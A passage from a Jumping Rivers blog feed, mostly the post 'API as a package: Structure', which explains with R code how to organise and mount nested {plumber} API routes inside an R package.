&lt;p&gt;If you&amp;rsquo;ve read this far, I&amp;rsquo;m sure you&amp;rsquo;re thinking &amp;ldquo;yes, I want to do that!&amp;rdquo; - in which case your next question might well be &amp;ldquo;so, what now?&amp;rdquo;. That&amp;rsquo;s where Jumping Rivers comes in! If you&amp;rsquo;d like to learn more about how we can help start your data journey, &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Our &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-tidyverse-readr-ggplot2-dplyr/" rel="external"&gt;Introduction to R&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt; courses are a great starting point!&lt;/p&gt;
&lt;p&gt;Want to create a dashboard in a hurry? See &lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Introduction to&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/data-exploration-with-tableau/" rel="external"&gt;Data Exploration with&lt;/a&gt; Tableau. Interested in programming? Then some of our more advanced &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/?date=January+23%2C+2023+-+Online" rel="external"&gt;R&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/?date=January+12%2C+2023+-+Newcastle" rel="external"&gt;Python&lt;/a&gt; courses might be for you! We also have courses on version control with &lt;a href="https://www.jumpingrivers.com/training/course/git-for-me/?date=December+12%2C+2022+-+Online" rel="external"&gt;Git for Me&lt;/a&gt; and
&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/?date=October+10%2C+2022+-+Newcastle" rel="external"&gt;Data visualisation with ggplot2&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Take a look at our &lt;a href="https://www.jumpingrivers.com/training/public/" rel="external"&gt;upcoming public courses&lt;/a&gt;, or &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;contact us&lt;/a&gt; to discuss tailored training for your team, both on-site and online.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/benefits-of-learning-data-skills/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>API as a package: Structure</title><link>https://www.jumpingrivers.com/blog/api-as-a-package-structure/</link><pubDate>Thu, 15 Sep 2022 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/api-as-a-package-structure/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/api-as-a-package-structure/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/api-as-a-package-structure/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is part one of our three-part series:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: API as a package: Structure (this post)&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-logging/" rel="external"&gt;Part 2: API as a package:
Logging&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/api-as-a-package-testing/" rel="external"&gt;Part 3: API as a package:
Testing&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="introduction"&gt;Introduction&lt;/h2&gt;
&lt;p&gt;At Jumping Rivers we were recently tasked with taking a prototype
application built in {shiny} to a public facing production environment
for a public sector organisation. During the scoping exercise it was
determined that a more appropriate solution to fit the requirements was
to build the application with a {plumber} API providing the interface to
the Bayesian network model and other application tools written in R.&lt;/p&gt;
&lt;p&gt;When building applications in {shiny} we have for some time been using
the “app as a package” approach which has been popularised by tools like
{golem} and {leprechaun}, in large part due to the convenience that
comes with leveraging the testing and dependency structure that our R
developers are comfortable with in authoring packages, and the ease with
which one can install and run an application in a new environment as a
result. For this project we looked to take some of these ideas to a
{plumber} application. This blog post discusses some of the thoughts and
resultant structure that came as a result of that process.&lt;/p&gt;
&lt;p&gt;As I began to flesh out this blog post I realised that it was becoming
very long, and there were a number of different aspects that I wanted to
discuss: structure, logging and testing to name a few. To try to keep
this a bit more palatable I will instead do a mini-series of blog posts
around the API as a package idea and focus predominantly on the
structure elements here.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2022-api-as-a-package-structure"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="api-as-a-package"&gt;API as a package&lt;/h2&gt;
&lt;p&gt;There are a few things I really like about the {shiny} app as a package
approach that I wanted to reflect in the design and build of a {plumber}
application as a package.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;It encourages a regular structure and organisation for an
application. All modules have a consistent naming pattern and
structure.&lt;/li&gt;
&lt;li&gt;It encourages leveraging the {testthat} package and including some
common tests across a series of applications, see
&lt;code&gt;golem::use_recommended_tests()&lt;/code&gt; for example.&lt;/li&gt;
&lt;li&gt;An instance of the app can be created via a single function call
which does all the necessary set up, say &lt;code&gt;my_package::run_app()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Primarily, I wanted these features in a form that could be reused across
{plumber} applications that we create both internally and for our
clients. As far as I know there isn’t a similar package that provides an
opinionated way of laying out a {plumber} application as a package, and
it is my intention to create one as a follow up to this work.&lt;/p&gt;
&lt;h3 id="regular-structure"&gt;Regular structure&lt;/h3&gt;
&lt;p&gt;When developing the solution for this particular project I did have in
the back of my mind that I wanted to create as much reusable structure
for any future projects of this sort as possible. I really wanted to
have an easy way to, from a package structure, be able to build out an
API with nested routes, using code that could easily transfer to another
package.&lt;/p&gt;
&lt;p&gt;I opted for a structure that utilised the &lt;code&gt;inst/extdata/api/routes&lt;/code&gt;
directory of a package as a basis with the idea that the following file
structure&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;| inst/extdata/api/routes/
|
| - model.R
| - reports/
    |
    | - pdf.R
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;with example route definitions inside&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;# model.R
#* @post /prediction
exported_function_from_my_package
# pdf.R
#* @post /weekly
exported_function_from_my_package
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would translate to an API with the following endpoints&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&amp;lt;host&amp;gt;/model/prediction&lt;/li&gt;
&lt;li&gt;&amp;lt;host&amp;gt;/reports/pdf/weekly&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;A few simple function definitions would allow us to do this for any
given package that uses this file structure.&lt;/p&gt;
&lt;p&gt;The first function here just grabs the directory from the current
package where I will define the endpoints that make up my API.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;get_internal_routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;.&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;system.file&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;extdata&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;api&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;routes&amp;#34;&lt;/span&gt;, path,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; utils&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;packageName&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; mustWork &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;code&gt;create_routes&lt;/code&gt; will recursively list all of the .R files within the
chosen directory and name them according to the name of the file. This
will make it easy to build out a number of “nested” routers that will
all be mounted into the same API, achieving the compartmentalisation
that we desire. For example the two files at
&lt;code&gt;&amp;lt;my_package&amp;gt;/inst/extdata/api/routes/model.R&lt;/code&gt; and
&lt;code&gt;&amp;lt;my_package&amp;gt;/inst/extdata/api/routes/reports/pdf.R&lt;/code&gt; will take on the
names &lt;code&gt;&amp;quot;model&amp;quot;&lt;/code&gt; and &lt;code&gt;&amp;quot;reports/pdf&amp;quot;&lt;/code&gt; respectively.&lt;/p&gt;
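&lt;p&gt;As a quick check of that naming rule, the sketch below rebuilds the example layout in a temporary directory and derives the names with base R only. The directory name &lt;code&gt;routes-demo&lt;/code&gt; is arbitrary, and listing relative paths is a simplification for illustration rather than the approach taken in the package.&lt;/p&gt;
&lt;pre&gt;&lt;code class="language-r" data-lang="r"&gt;# Rebuild the example layout in a temporary directory (illustration only)
dir = file.path(tempdir(), "routes-demo")
dir.create(file.path(dir, "reports"), recursive = TRUE, showWarnings = FALSE)
invisible(file.create(
  file.path(dir, "model.R"),
  file.path(dir, "reports", "pdf.R")
))

# Relative paths of all .R files, with the extension stripped
files = list.files(dir, recursive = TRUE, pattern = "\\.R$")
route_names = sub("\\.R$", "", files)
route_names
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The package&amp;rsquo;s own helpers work from full file paths and attach the derived names to them:&lt;/p&gt;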
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;add_default_route_names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(routes, dir) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(routes, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;fixed&lt;/span&gt;(dir))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; stringr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;str_remove&lt;/span&gt;(names, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.R$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(routes) &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; names
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;create_routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(dir) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; routes &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dir, recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; full.names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.R$&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;add_default_route_names&lt;/span&gt;(routes, dir)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The final few pieces to the puzzle ensure that we have &lt;code&gt;/&lt;/code&gt; at the
beginning of a string (&lt;code&gt;ensure_slash()&lt;/code&gt;), for the purpose of mounting
components to my router. &lt;code&gt;add_plumber_definition()&lt;/code&gt; just calls the
necessary functions from {plumber} to process a new route file, i.e. from
the decorated functions in the file create the routes, and then mount
them at a given path to an existing router object. For example given a
file “test.R” that has a &lt;code&gt;#* @get /identity&lt;/code&gt; decorator against a
function definition and &lt;code&gt;endpoint = &amp;quot;test&amp;quot;&lt;/code&gt; we would add
&lt;code&gt;/test/identity&lt;/code&gt; to the existing router. &lt;code&gt;generate_api()&lt;/code&gt; takes a full
named vector/list of file paths, ensures they all have an appropriate
name and mounts them all to a new &lt;code&gt;Plumber&lt;/code&gt; router object.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ensure_slash &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(string) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; has_slash &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;grepl&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;^/&amp;#34;&lt;/span&gt;, string)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ff7b72"&gt;if&lt;/span&gt; (has_slash) string &lt;span style="color:#ff7b72"&gt;else&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;/&amp;#34;&lt;/span&gt;, string)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;add_plumber_definition &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(pr, endpoint, file, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; router &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;(file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; file, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr_mount&lt;/span&gt;(pr &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; pr,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; endpoint,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; router &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; router
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;generate_api &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(routes, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; endpoints &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;map_chr&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;names&lt;/span&gt;(routes), ensure_slash)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;reduce2&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; endpoints, .y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; routes,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .f &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; add_plumber_definition, &lt;span style="color:#79c0ff"&gt;...&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; .init &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; plumber&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;pr&lt;/span&gt;(&lt;span style="color:#79c0ff"&gt;NULL&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With these defined I can then, as I develop my package, add new routes
by defining functions and adding {plumber} tag annotations to files in
&lt;code&gt;/inst/&lt;/code&gt; and rebuild the new API with&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Nothing about this code is specific to my current package, so it is
transferable. As a concrete, but very much simplified, example, I might
have the following collection of files/annotations under
&lt;code&gt;&amp;lt;my_package&amp;gt;/inst/extdata/api/routes&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## File: /example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Taken from plumber quickstart documentation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# https://www.rplumber.io/articles/quickstart.html&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The message is: &amp;#39;&amp;#34;&lt;/span&gt;, msg, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## File: /test.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /is_alive&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(alive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## File: /nested/example.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Taken from plumber quickstart documentation&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# https://www.rplumber.io/articles/quickstart.html&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#* @get /echo&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(msg&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#34;&lt;/span&gt;) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(msg &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;The message is: &amp;#39;&amp;#34;&lt;/span&gt;, msg, &lt;span style="color:#a5d6ff"&gt;&amp;#34;&amp;#39;&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which would give me&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;get_internal_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;create_routes&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;generate_api&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# # Plumber router with 0 endpoints, 4 filters, and 3 sub-routers.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# # Use `pr_run()` on this object to start the API.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[queryString]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[body]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[cookieParser]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──[sharedSecret]&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ├──/example&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# │ │ # Plumber router with 1 endpoint, 4 filters, and 0 sub-routers.&lt;/span&gt;
